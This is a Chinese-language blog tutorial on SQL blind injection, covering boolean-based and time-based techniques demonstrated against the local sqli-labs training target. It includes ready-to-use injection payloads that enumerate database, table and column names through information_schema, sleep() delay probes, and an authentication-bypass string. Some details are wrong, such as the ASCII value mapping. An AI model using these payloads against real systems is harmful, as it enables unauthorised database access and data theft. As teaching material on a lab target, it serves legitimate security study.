SQL盲注(原理概述、分类)

盲注原理

盲注的分类

盲注常用函数

一、SQL盲注概述

盲注:即在SQL注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或尝试,这个过程成为盲注

1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。
2.盲注是不能通过直接显示的途径来获取数据库数据的方法。
在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同,一般分为三类)

需要掌握函数
substr用法
格式:substr(索引开始位,索引结束位)
索引开始从1开始
ascii用法
length用法

1、布尔盲注

原理:
盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False

流程:
求当前数据库的长度以及ASCII
求当前数据库表的ASCII
求当前数据库表中的个数
求当前数据库表中其中一个表的表名长度
求当前数据库中其中一个表的表名的ASCII
求列名的数量
求列名的长度
求列名的ascii
求字段的数量
求字段内容的长度
求字段内容的ascii
这里以sqlabs靶场为例

通过length函数 判断数据库长度和数据表字段信息数量。
通过substr、ascii函数 判断数据库名、表名、字段值等。

求数据库的长度       
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database()) = 8 --+

判断数据库第一位的字母
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and substr(database(),1,1) = 's' --+

求数据库中表的长度
第一个表名长度:'and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6--+
第二个表名长度 'and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8--+
长度为6、8

查询第一个表的第一位字符
'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=117--+

查询第二个表的第二个字符
'and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=117--+

判断字段的长度
'and length((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1))=6--+‘
 
 判断字段长度名称第一个字母的ascii
 'and ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),1,1))=117--+

判断第二位长度名称第一个字母的ascii
'and ord(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),2,1))=115--+

2、时间盲注

原理:
如论我们输入的语句是否合法,页面的显示信息是固定的,即不会出现查询的信息,也不会出现报错信息。可以尝试基于时间的盲注来测试。根据页面响应的时间,来判断输入的信息是否正确。
在可以判断返回正确还是错误的情况下,两种注入方法都可以用,延时注入更倾向于无法判断正误,通过自己构造页面刷新时间来判断正误。

通过构造的语句查看页面响应时间来判断
会用到的函数:lenght、substr、ascii  limit 
if(条件,A,B)如果条件成立执行A 否则执行B
可以结合 > < = 判断运算符,采用二分法,构造如下的语句,分别猜测试出8字符,比如,先用 > 50判断,如果成立,再用< 123 判断,如果不成立,则正确的值就在50-123之前,
这样不段的尝试最终用= 确定具体值。
?id=1’ and if ((ascii(substr(database(),1,1))>50),sleep(3),1) – +
?id=1’ and if ((ascii(substr(database(),1,1))<123),sleep(3),1) – +
?id=1’ and if ((ascii(substr(database(),1,1))=115),sleep(3),1) – +
  • sql时间类型的盲注本质是利用插入的sql语句执行造成时间延迟

MySQL时间盲注几种延迟方法:

get_lock函数() 需要使用 mysql_pconnect函数来连接数据库。

在一个session中可以先锁定一个变量例如:select get_lock(‘do9gy’,1)。

然后通过另一个session再次执行get_lock(‘do9gy’,5)此时会产生5秒的延迟,其效果类似于sleep(5)。

1、二分法

  • 二分法SQL盲注示例
返回正常说明长度小于10 
and exists(select * from admin where id=1 and len(name)< 10)
返回正常说明长度大于5
and exists(select * from admin where id=1 and len(name)> 5)
返回正常说明密码第一个字符是应用('0'='48','a'='65','A‘=97)
and exists (select * from admin where id=1 and mid(password,1,1)>'a')
mid() 截取
mid(column_name,start,length)

rand() 产生一个随机函数

floor() 向下取整的函数
floor(rand(0)*2) 返回0或者1
floor(rand(0)*2) 返回0或者1
创建一个table
insert into table value(1,‘a’,‘b’) select floor(rand(0)*2) from tbale

SQL注入常用函数

1 .布尔型

  • left(a,b)从左截取a 的前b位:left(database(),1) > ‘s’
  • substr(a,b,c)从b位置开始,截取字符串a的c长度
  • ascii() 将某个字符转换为ascii值:ascii(substr(user),1,1)=101#
  • mid(a,b,c)从位置b开始,截取a字符串的c位 regexp正则表达式的用法
  • user()结果位root ,regexp为匹配root的正则表达式:select user()’

(1)left(a,b)函数

  • LEFT()函数是一个字符串函数,它返回具有指定长度的字符串的左边部分。
  • LEFT(str,length);如果str或length参数为null,则返回null。
  • str是要提取字符串的字符串、length是一个正整数,指定将从左边返回的字符数。
  • length大于str字符串的长度,则LEFT返回整个str字符串 (返回str的长度,以字节为单位,一个多字节可算作多字节。

(2)substr() 或 substring()函数

  • SBUSTR(str,pos)开始的位置,一直截取到最后。

  • SBUSTR(str,pos,len);表示从pos开始的位置,截取len个字符(空白也算字符)![在这里插入图片描述](https://img-blog.csdnimg.cn/2020122916425630.png)

  • SELECT SUBSTRING(‘chinese’,-3); //倒数第三个字符之后的子字符串-ese

(3)ord() mid()函数

  • 函数ord() 函数返回字符串str的最左面字符的ASCII代码值
    在这里插入图片描述

  • 函数mid()用于得到字符串的一部分。
    在这里插入图片描述

(4)cast() 和 convert()函数
cast() convert() 函数可用来获取一个类型的值,并生产另一个类型的值。

> 可转换的类型 二进制,通带binary前缀的效果:BINARY 字符型,
> 可带参数:char() 
> 日期:DATE 
> 时间:time
> 日期时间型:datetime 
> 浮点型:decimal 
> 整数:signen 
> 无符号整数:unsignen

(5)ifnull()函数

  • IFNULL()意义是当字段A是NULL时取B,不是NULL取A

(6)sleep()或benchmark()

通过执行select sleep(n)可以让此语句执行n秒
条件:指定条件的记录存在时才会停止指定的秒数
列如:查询条件为name='pig’结果表明记录不存在,执行结果为0

(7).基于时间的盲注在使用延迟函数上可以有两个选择:

benchmark(count,expr)函数 
sleep(time)函数
前者通过将expr语句执行 count次来到达延迟的目的,后者是直接延迟time时间
benchmark是一个内置函数,其作用是来测试一写函数的执行速度,benchmark()其中有两个参数,
第一个是执行次数,另一个是要执行的函数或者表达式。

3.Xpath类型函数(mysql version >= 5.1.5)

(1)updatexml() 函数功能:改变文档中符合条件的节点的值。
Updatexml(xml_documnet,XPath_string,new_value);
第一个参数:XML_document是string格式,为XML文档对象的名称
第二个参数:XPath_string(Xpath格式的字符串)
第三个参数:new_value,string格式,替换查找到的符合条件的数据
超过长度可以配合substr()

(2)extractvalue() 函数功能:对XML文档进行查询的函数,其实就是相当于HTML文件中标签查找元素。

语法:extractvalue(目标XML文件,XML路径)

第二个参数 xml中位置是可以操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx…
这种格式,如果写入其他格式,就会报错,并且会返回写入的非法格式内容,而这个非法内容就是号想要查询的内容

  • 28
    点赞
  • 147
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
SQL注入是一种常见的网络安全漏洞,攻击者可以通过在用户输入的数据中插入恶意的SQL语句来实现对数据库的非授权访问。 盲注是一种特殊的SQL注入技术,它在攻击过程中无法直接获取到数据库返回的具体信息,但通过不断地进行布尔盲注或时间盲注来推断出数据的一些特征。 在进行盲注时,攻击者通常会使用布尔盲注或时间盲注的方法来逐渐推断出数据库中的信息。布尔盲注是通过构造恶意的SQL语句,利用数据库的布尔逻辑判断条件来判断某个条件是否成立,从而推断出数据的一些特征。时间盲注则是通过构造恶意的SQL语句,利用数据库的延时函数来判断某个条件是否成立,从而推断出数据的一些特征。 例如,在一个登录功能中存在SQL注入漏洞的情况下,攻击者可以构造恶意的输入来绕过登录验证,比如输入 `' OR '1'='1';--`,这会导致SQL语句变成类似 `SELECT * FROM users WHERE username='' OR '1'='1';--' AND password=''` 的形式,其中 `' OR '1'='1'` 的条件永远为真,绕过了用户名和密码的验证。 这就是SQL注入盲注的基本原理,攻击者通过构造恶意的输入来篡改原有的SQL语句,从而获取数据库中的信息或实现其他非授权操作。为了防止SQL注入攻击,开发者需要对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句来防止恶意SQL注入的发生。
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值